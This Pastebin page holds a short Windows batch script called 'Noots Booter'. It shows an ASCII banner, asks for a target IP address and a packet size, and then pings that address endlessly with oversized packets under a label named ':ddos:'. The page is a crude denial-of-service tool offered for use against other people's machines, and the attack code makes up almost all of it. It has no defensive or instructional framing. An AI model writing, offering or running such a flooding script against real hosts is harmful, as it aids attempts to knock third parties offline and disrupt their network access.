Advertisement
mrtennisball9

Noots Booter

Apr 5th, 2020
7,442
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Batch 1.16 KB | None | 0 0
  1.  
  2. @echo off
  3. color 0a
  4. title Noots Booter
  5. cls
  6.  
  7.  
  8. echo Created By Mrtennisball9
  9.  
  10. :greetings
  11.  
  12.  
  13. ECHO M"""""""`YM                     dP               M#"""""""'M                      dP                    
  14. ECHO M  mmmm.  M                     88               ##  mmmm. `M                     88                    
  15. ECHO M  MMMMM  M .d8888b. .d8888b. d8888P .d8888b.    #'        .M .d8888b. .d8888b. d8888P .d8888b. 88d888b.
  16. ECHO M  MMMMM  M 88'  `88 88'  `88   88   Y8ooooo.    M#  MMMb.'YM 88'  `88 88'  `88   88   88ooood8 88'  `88
  17. ECHO M  MMMMM  M 88.  .88 88.  .88   88         88    M#  MMMM'  M 88.  .88 88.  .88   88   88.  ... 88      
  18. ECHO M  MMMMM  M `88888P' `88888P'   dP   `88888P'    M#       .;M `88888P' `88888P'   dP   `88888P' dP      
  19. ECHO MMMMMMMMMMM                                      M#########M                                            
  20.                                                                                                    
  21.  
  22.  
  23. goto start
  24. :start:
  25. ping localhost >nul
  26. @echo please insert ip address
  27. set /p x=ip address:
  28. goto packets
  29. :packets:
  30. set /p y=packets:
  31. goto ddos
  32. :ddos:
  33. color 0a
  34. ping %x% -t -l %y%
  35. color 0a
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement